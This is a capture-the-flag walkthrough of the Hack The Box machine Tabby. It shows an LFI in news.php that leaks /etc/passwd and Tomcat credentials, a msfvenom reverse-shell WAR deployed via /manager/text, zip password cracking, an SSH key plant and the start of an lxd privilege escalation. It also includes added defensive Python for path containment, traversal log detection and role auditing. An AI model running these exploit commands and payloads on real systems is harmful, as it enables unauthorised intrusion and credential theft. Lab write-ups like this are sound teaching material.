Tabby
Port scan
u505@naos:~/HTB/Machines/Tabby$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.194
Starting masscan 1.0.5 at 2021-01-07 23:26:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Discovered open port 22/tcp on 10.10.10.194
u505@naos:~/HTB/Machines/Tabby$ nmap -sC -sV tabby
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-07 18:26 EST
Nmap scan report for tabby (10.10.10.194)
Host is up (0.036s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
Web enumeration (port 80)
The home page links to news.php with the argument file=statement.
Dirsearch
u505@naos:~/HTB/Machines/Tabby$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,js" -f -t 100 -u http://megahosting.htb
Extensions: txt, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 23053
Error Log: /opt/utils/dirsearch/logs/errors-21-01-07_18-39-23.log
Target: http://megahosting.htb/
Output File: /opt/utils/dirsearch/reports/megahosting.htb/_21-01-07_18-39-23.txt
[18:39:23] Starting:
[18:39:23] 403 - 280B - /.hta.php
[18:39:27] 403 - 280B - /.hta/
[18:39:29] 403 - 280B - /.htaccess.php
[18:39:32] 403 - 280B - /.htpasswd.js
[18:39:33] 403 - 280B - /.hta.js
[18:39:33] 301 - 319B - /assets -> http://megahosting.htb/assets/
[18:39:33] 403 - 280B - /assets/
[18:39:36] 403 - 280B - /.hta.txt
[18:39:37] 403 - 280B - /.htaccess.js
[18:39:37] 403 - 280B - /.htpasswd.txt
[18:39:37] 403 - 280B - /.htpasswd.php
[18:39:49] 200 - 766B - /favicon.ico
[18:39:49] 301 - 318B - /files -> http://megahosting.htb/files/
[18:39:49] 403 - 280B - /files/
[18:39:53] 403 - 280B - /icons/
[18:39:53] 200 - 14KB - /index.php
[18:39:53] 200 - 14KB - /index.php/
[18:40:00] 200 - 0B - /news.php
[18:40:08] 200 - 2KB - /Readme.txt
[18:40:11] 403 - 280B - /server-status/
[18:40:11] 403 - 280B - /server-status
Task Completed
There is a folder named files, and the news.php script we found earlier.
u505@naos:~/HTB/Machines/Tabby$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,php,js" -f -t 100 -u http://megahosting.htb/files
Extensions: txt, php, js | HTTP method: GET | Threads: 100 | Wordlist size: 23053
Error Log: /opt/utils/dirsearch/logs/errors-21-01-07_18-41-28.log
Target: http://megahosting.htb/files/
Output File: /opt/utils/dirsearch/reports/megahosting.htb/files_21-01-07_18-41-28.txt
[18:41:28] Starting:
[18:41:31] 403 - 280B - /files/.hta.php
[18:41:31] 403 - 280B - /files/.htaccess.js
[18:41:32] 403 - 280B - /files/.htpasswd.js
[18:41:32] 403 - 280B - /files/.hta/
[18:41:32] 403 - 280B - /files/.hta.js
[18:41:32] 403 - 280B - /files/.hta.txt
[18:41:32] 403 - 280B - /files/.htaccess.php
[18:41:32] 403 - 280B - /files/.htpasswd.txt
[18:41:32] 403 - 280B - /files/.htpasswd.php
[18:41:36] 301 - 326B - /files/archive -> http://megahosting.htb/files/archive/
[18:41:36] 403 - 280B - /files/archive/
[18:42:19] 200 - 6KB - /files/statement
Task Completed
The file statement is in the folder files.
LFI
We can access the file statement.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/files/statement 2>/dev/null | head -n 10
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Mega Hosting</title>
<meta name="description" content="">
The news.php script returns nothing when it is called without arguments.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php
When a filename is passed in the file argument of the URL, the script returns the content of that file from the files folder, here statement.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=statement 2>/dev/null | head -n 10
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Mega Hosting</title>
<meta name="description" content="">
Passing the filename ../../../../etc/passwd discloses a local file inclusion vulnerability in the news.php script.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
tomcat:x:997:997::/opt/tomcat:/bin/false
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
ash:x:1000:1000:clive:/home/ash:/bin/bash
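The root cause is that news.php hands the file parameter to an include without pinning it to the files directory. As an added example that is not code from the writeup, the Python below shows the containment check a fixed news.php needs, plus a detector that picks traversal attempts against news.php out of Apache access log lines; the web root it builds and the log lines are constructed.

```python
"""Added example, not from the writeup: containment check for the news.php
``file`` parameter and a detector for traversal attempts in Apache access
logs.  The web root and the log lines are constructed for this demo."""
import os
import re
import tempfile
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit


def resolve_news_file(base_dir: str, requested: str) -> Optional[str]:
    """Return the absolute path of ``requested`` inside ``base_dir``, or None
    when the name would escape it (the bug news.php has on Tabby)."""
    base = os.path.realpath(base_dir)
    # os.path.join discards ``base`` when ``requested`` is absolute, and
    # realpath collapses ``..`` and symlinks; both cases are checked below.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith: "/var/www/html2" must not pass for
    # a base of "/var/www/html".
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None


def demo_resolver() -> Tuple[bool, Optional[str], Optional[str]]:
    """Build a throwaway web root shaped like Tabby's (files/statement) and
    try one legitimate name and two traversal names against it."""
    with tempfile.TemporaryDirectory() as root:
        files_dir = os.path.join(root, "files")
        os.mkdir(files_dir)
        with open(os.path.join(files_dir, "statement"), "w") as fh:
            fh.write("<!doctype html>\n")
        ok = resolve_news_file(files_dir, "statement")
        traversal = resolve_news_file(files_dir, "../../../../etc/passwd")
        absolute = resolve_news_file(files_dir, "/etc/passwd")
        return (ok is not None and ok.endswith("statement"), traversal, absolute)


# Constructed Apache combined-log lines in the shape Tabby's httpd would write.
SAMPLE_LOG: List[str] = [
    '10.10.14.12 - - [07/Jan/2021:18:45:01 -0500] "GET /news.php?file=statement HTTP/1.1" 200 6507',
    '10.10.14.12 - - [07/Jan/2021:18:46:10 -0500] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2351',
    '10.10.14.12 - - [07/Jan/2021:18:47:33 -0500] "GET /news.php?file=..%2F..%2F..%2F..%2Fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 412',
    '10.10.14.12 - - [07/Jan/2021:18:48:00 -0500] "GET /files/statement HTTP/1.1" 200 6507',
]

_REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def lfi_suspect(log_line: str) -> Optional[str]:
    """Return the decoded ``file`` value when a request to news.php carries a
    parent-directory reference or an absolute path, else None."""
    m = _REQUEST.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.endswith("/news.php"):
        return None
    # parse_qs decodes one layer of %XX; a second unquote catches %252e tricks.
    for value in parse_qs(parts.query).get("file", []):
        decoded = unquote(value).replace("\\", "/")
        if ".." in decoded.split("/") or decoded.startswith("/"):
            return decoded
    return None


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Index and decoded file parameter of every suspicious line."""
    hits = []
    for idx, line in enumerate(lines):
        value = lfi_suspect(line)
        if value is not None:
            hits.append((idx, value))
    return hits
```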
Tomcat enumeration (port 8080)
The Tomcat installation looks like a default one, with the manager applications, the documentation and the examples present.
The documentation reveals the exact Tomcat version: 9.0.31.
Dirsearch
The enumeration does not provide additional information; only the expected default applications (folders) are found.
u505@naos:~/HTB/Machines/Tabby$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common.txt -e "txt,jsp" -f -t 100 -u http://megahosting.htb:8080/
Extensions: txt, jsp | HTTP method: GET | Threads: 100 | Wordlist size: 18447
Error Log: /opt/utils/dirsearch/logs/errors-21-01-07_18-48-40.log
Target: http://megahosting.htb:8080/
Output File: /opt/utils/dirsearch/reports/megahosting.htb/_21-01-07_18-48-40.txt
[18:48:40] Starting:
[18:48:46] 302 - 0B - /docs -> /docs/
[18:48:46] 200 - 17KB - /docs/
[18:48:48] 302 - 0B - /examples -> /examples/
[18:48:48] 200 - 1KB - /examples/
[18:48:54] 302 - 0B - /host-manager -> /host-manager/
[18:48:55] 302 - 0B - /host-manager/ -> /host-manager/html
[18:48:56] 200 - 2KB - /index.html
[18:49:00] 302 - 0B - /manager -> /manager/
[18:49:00] 302 - 0B - /manager/ -> /manager/html
Task Completed
tomcat-users.xml
The LFI gives access to local files. The goal is to read the tomcat-users.xml file in order to access the management console.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../var/lib/tomcat9/webapps/ROOT/index.html 2> /dev/null | head
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat</title>
</head>
<br>
<body>
<h1>It works !</h1>
The index.html was found where I expected.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../usr/share/doc/tomcat9-common/RUNNING.txt.gz 2>/dev/null | gzip -d | head
================================================================================
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at

      http://www.apache.org/licenses/LICENSE-2.0
The RUNNING.txt file too. But the tomcat-users.xml file was not found in the default location. Nmap detected that the OS is Ubuntu. I installed Tomcat locally on the Kali box to find the default Debian location of the file.
u505@naos:/etc/apache2/sites-enabled$ sudo apt install tomcat9
u505@naos:/etc/apache2/sites-enabled$ find / -name tomcat-users.xml 2>/dev/null
/usr/share/tomcat9/etc/tomcat-users.xml
And the file is in the expected Debian location.
u505@naos:~/HTB/Machines/Tabby$ curl http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
</tomcat-users>
Reverse shell from Tomcat
Access Tomcat admin panel
We access the host manager.
But the manager panel is not accessible.
tomcatWarDeployer.py
At first I tried to use mgeeky's tomcatWarDeployer script (as we did in Jerry), but it failed, because we do not have the admin-gui role. That is the reason why the manager panel is not accessible.
u505@naos:~/HTB/Machines/Tabby$ python /opt/utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.194:8080 -U tomcat -P '$3cureP4s5w0rd123!' -H 10.10.14.12 -p 4444 -v -u /manager/html
tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.12:4444.
DEBUG: Trying Creds: ["tomcat:$3cureP4s5w0rd123!"]: Browsing to "http://10.10.10.194:8080/manager/html"...
DEBUG: Trying to fetch: "http://10.10.10.194:8080/manager/html/"
WARNING: Invalid credentials supplied for Apache Tomcat.
ERROR: Service not found or could not authenticate to it.
Script war deployment
With the manager-script role, we should be able to deploy the war.
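Which manager URL a credential reaches is decided by the roles in tomcat-users.xml: each role unlocks its own endpoint, so an account can hold the host-manager UI and the text deploy interface without the manager UI. This added Python audit script (not from the writeup or from Tomcat) parses a tomcat-users.xml constructed in the same shape as the one recovered above and reports what each account can reach; the role-to-endpoint table follows the Tomcat 9 manager and host-manager how-to pages.

```python
"""Added example, not from the writeup or from Tomcat: audit a
tomcat-users.xml and report which manager endpoints each account can reach.
The XML below is constructed in the same shape as the file recovered above."""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Role -> endpoints, per the Tomcat 9 manager and host-manager how-to pages.
# manager-gui, manager-script and manager-jmx also open the status page.
ROLE_ENDPOINTS: Dict[str, List[str]] = {
    "manager-gui":    ["/manager/html", "/manager/status"],
    "manager-script": ["/manager/text", "/manager/status"],
    "manager-jmx":    ["/manager/jmxproxy", "/manager/status"],
    "manager-status": ["/manager/status"],
    "admin-gui":      ["/host-manager/html"],
    "admin-script":   ["/host-manager/text"],
}
# Either of these lets the holder deploy a WAR, i.e. run code on the server.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Tomcat advises against combining the browser UI with script/JMX roles:
# a CSRF against the UI session could then drive the text interface.
CSRF_PAIR = {"manager-script", "manager-jmx"}

# Constructed sample; passwords are placeholders.
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-gui"/>
  <role rolename="manager-status"/>
  <user username="tomcat"  password="REDACTED" roles="admin-gui,manager-script"/>
  <user username="ops"     password="REDACTED" roles="manager-gui,manager-script"/>
  <user username="monitor" password="REDACTED" roles="manager-status"/>
</tomcat-users>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace so files with or without xmlns both parse."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> Dict[str, dict]:
    """One report entry per <user>: roles, reachable endpoints and risk flags."""
    root = ET.fromstring(xml_text)
    report: Dict[str, dict] = {}
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        roles = [r.strip() for r in (el.get("roles") or "").split(",") if r.strip()]
        role_set = set(roles)
        endpoints = sorted({ep for r in roles for ep in ROLE_ENDPOINTS.get(r, [])})
        report[el.get("username")] = {
            "roles": roles,
            "endpoints": endpoints,
            "can_deploy": bool(role_set & DEPLOY_ROLES),
            "csrf_risk": "manager-gui" in role_set and bool(role_set & CSRF_PAIR),
            "unknown_roles": sorted(role_set - set(ROLE_ENDPOINTS)),
        }
    return report


def deploy_capable(report: Dict[str, dict]) -> List[str]:
    """Accounts whose credentials alone are enough to push code to the server."""
    return sorted(name for name, info in report.items() if info["can_deploy"])
```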
From the Tomcat documentation:
Deploy A New Application Archive (WAR) Remotely

http://localhost:8080/manager/text/deploy?path=/foo

Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.
This command is executed by an HTTP PUT request.
The .WAR file may include Tomcat specific deployment configuration, by including a Context configuration XML file in /META-INF/context.xml.
URL parameters include:
- update: When set to true, any existing update will be undeployed first. The default value is set to false.
- tag: Specifying a tag name, this allows associating the deployed webapp with a tag or label. If the web application is undeployed, it can be later redeployed when needed using only the tag.
- config: URL of a Context configuration ".xml" file in the format file:/absolute/path/to/a/context.xml. This must be the absolute path of a web application Context configuration ".xml" file which contains the Context configuration element.

NOTE - This command is the logical opposite of the /undeploy command.
If installation and startup is successful, you will receive a response like this:
OK - Deployed application at context path /foo

Otherwise, the response will start with FAIL and include an error message. Possible causes for problems include:
- Application already exists at path /foo: The context paths for all currently running web applications must be unique. Therefore, you must undeploy the existing web application using this context path, or choose a different context path for the new one. The update parameter may be specified as a parameter on the URL, with a value of true to avoid this error. In that case, an undeploy will be performed on an existing application before performing the deployment.
- Encountered exception: An exception was encountered trying to start the new web application. Check the Tomcat logs for the details, but likely explanations include problems parsing your /WEB-INF/web.xml file, or missing classes encountered when initializing application event listeners and filters.
Creation of the WAR reverse shell.
u505@naos:~/HTB/Machines/Tabby$ msfvenom -p java/shell_reverse_tcp lhost=10.10.14.12 lport=4444 -f war -o u505.war
Payload size: 13397 bytes
Final size of war file: 13397 bytes
Saved as: u505.war
Start our listener.
u505@naos:~/HTB/Machines/Tabby/tomcat/apache-tomcat-9.0.31/conf$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Deploy our war application.
u505@naos:~/HTB/Machines/Tabby$ curl -u tomcat --upload-file u505.war http://tabby:8080/manager/text/deploy?path=/u505
Enter host password for user 'tomcat':
OK - Deployed application at context path [/u505]
Call our application.
u505@naos:~/HTB/Machines/Tabby$ curl http://tabby:8080/u505/
The reverse shell opens.
u505@naos:~/HTB/Machines/Tabby/tomcat/apache-tomcat-9.0.31/conf$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.194.
Ncat: Connection from 10.10.10.194:48830.
whoami
tomcat
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 2: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
tomcat@tabby:/var/lib/tomcat9$
Pivot to user ash
After a long enumeration, one file looked interesting.
tomcat@tabby:/var/www/html/files$ ls -ltr
total 28
-rw-r--r-- 1 root root 6507 Jun 16 2020 statement
-rw-r--r-- 1 ash ash 8716 Jun 16 2020 16162020_backup.zip
drwxr-xr-x 2 root root 4096 Jun 16 2020 revoked_certs
drwxr-xr-x 2 root root 4096 Jun 16 2020 archive
We download it.
u505@naos:~/HTB/Machines/Tabby$ wget -q http://tabby/files/16162020_backup.zip
Crack zip password
The zip file was encrypted.
u505@naos:~/HTB/Machines/Tabby$ zip2john 16162020_backup.zip > zip.hash
16162020_backup.zip/var/www/html/assets/ is not encrypted!
ver 1.0 16162020_backup.zip/var/www/html/assets/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/favicon.ico PKZIP Encr: 2b chk, TS_chk, cmplen=338, decmplen=766, crc=282B6DE2
ver 1.0 16162020_backup.zip/var/www/html/files/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=3255, decmplen=14793, crc=285CC4D6
ver 1.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/logo.png PKZIP Encr: 2b chk, TS_chk, cmplen=2906, decmplen=2894, crc=2F9F45F
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/news.php PKZIP Encr: 2b chk, TS_chk, cmplen=114, decmplen=123, crc=5C67F19E
ver 2.0 efh 5455 efh 7875 16162020_backup.zip/var/www/html/Readme.txt PKZIP Encr: 2b chk, TS_chk, cmplen=805, decmplen=1574, crc=32DB9CE3
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time
u505@naos:~/HTB/Machines/Tabby$ cat zip.hash 16162020_backup.zip:$pkzip2$3*2*1*0*0*24*02f9*5d46*ccf7b799809a3d3c12abb83063af3c6dd538521379c8d744cd195945926884341a9c4f74*1*0*8*24*285c*5935*f422c178c96c8537b1297ae19ab6b91f497252d0a4efe86b3264ee48b099ed6dd54811ff*2*0*72*7b*5c67f19e*1b1f*4f*8*72*5c67*5a7a*ca5fafc4738500a9b5a41c17d7ee193634e3f8e483b6795e898581d0fe5198d16fe5332ea7d4a299e95ebfff6b9f955427563773b68eaee312d2bb841eecd6b9cc70a7597226c7a8724b0fcd43e4d0183f0ad47c14bf0268c1113ff57e11fc2e74d72a8d30f3590adc3393dddac6dcb11bfd*$/pkzip2$::16162020_backup.zip:var/www/html/news.php, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
u505@naos:~/HTB/Machines/Tabby$ john zip.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:00 DONE (2021-01-07 20:25) 1.265g/s 13127Kp/s 13127Kc/s 13127KC/s adnbrie..adambossmaster
Use the "--show" option to display all of the cracked passwords reliably
Session completed
u505@naos:~/HTB/Machines/Tabby$ john zip.hash --show
16162020_backup.zip:admin@it::16162020_backup.zip:var/www/html/news.php, var/www/html/logo.png, var/www/html/index.php:16162020_backup.zip
1 password hash cracked, 0 left
The archive is a backup of the website; it does not provide any new information.
Pivot as ash user
The file was owned by the user ash.
tomcat@tabby:/var$ su - ash
su - ash
Password: admin@it
ash@tabby:~$ whoami
ash
User flag
SSH key pair generation
u505@naos:~/HTB/Machines/Tabby$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/u505/.ssh/id_rsa): u505
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in u505
Your public key has been saved in u505.pub
The key fingerprint is:
SHA256:E4RYiznNKPC5h6MHD2QfgzlTn4aeAblWIJHVEe53jO0 u505@naos
The key's randomart image is:
+---[RSA 3072]----+
|+*+oo=...        |
|o+=+=*oo         |
| B*=*++ .        |
|oo==*. + .       |
|+ ++o o S        |
| = o . o .       |
|. o E            |
| .               |
|                 |
+----[SHA256]-----+
Add public key to ash user.
ash@tabby:~$ mkdir .ssh
ash@tabby:~$ cd .ssh
ash@tabby:~/.ssh$ echo 'ssh-rsa <PUBLIC_KEY> u505@naos' >> authorized_keys
ash@tabby:~/.ssh$ chmod 600 authorized_keys
SSH as ash
u505@naos:~/HTB/Machines/Tabby$ ssh -i u505 ash@tabby
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-31-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
System information as of Fri 08 Jan 2021 01:59:15 AM UTC
  System load:  0.0                Processes:               156
  Usage of /:   34.1% of 15.68GB   Users logged in:         0
  Memory usage: 36%                IPv4 address for ens192: 10.10.10.194
  Swap usage:   0%
0 updates can be installed immediately. 0 of these updates are security updates.
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Tue May 19 11:48:00 2020
ash@tabby:~$ cat user.txt <USER_FLAG>
Privilege escalation
First reflex, no luck :(
ash@tabby:~$ sudo -l
[sudo] password for ash:
Sorry, user ash may not run sudo on tabby.

u505@naos:~/HTB/Machines/Tabby/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
Download enumeration tools
ash@tabby:~$ wget -q http://10.10.14.12/pspy64
ash@tabby:~$ wget -q http://10.10.14.12/LinEnum.sh
ash@tabby:~$ chmod +x LinEnum.sh pspy64
Execution of LinEnum.sh
ash@tabby:~$ ./LinEnum.sh -t
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982
...
[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
### SCAN COMPLETE ####################################
ash is a member of the lxd group. That means we can create a privileged container that mounts the host file system and read it as root (as we did, by an alternative route, in Apocalyst).
Create the privilege escalation image
First we create the image.
u505@naos:~/HTB/Machines/Tabby$ wget -q https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
u505@naos:~/HTB/Machines/Tabby$ chmod +x build-alpine
u505@naos:~/HTB/Machines/Tabby$ sudo ./build-alpine
[sudo] password for u505:
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86_64
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
...
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://ftp.halifax.rwth-aachen.de/alpine/v3.12/main
fetch http://ftp.halifax.rwth-aachen.de/alpine/v3.12/main/x86_64/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r10)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1i-r0)
(7/19) Installing libssl1.1 (1.1.1i-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r10)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.3-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
With the image created, we upload it to the target server.
u505@naos:~/HTB/Machines/Tabby$ mv alpine-v3.12-x86_64-20210108_0403.tar.gz web/
Download it on the target server.
ash@tabby:~$ wget -q http://10.10.14.12/alpine-v3.12-x86_64-20210108_0403.tar.gz
First we need to initialize LXD. The storage backend is set to dir, i.e. the host file system.
Run privilege escalation container
ash@tabby:~$ lxd init
2021/01/08 10:07:30 usbid: failed to load: open /usr/share/misc/usb.ids: no such file or directory
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
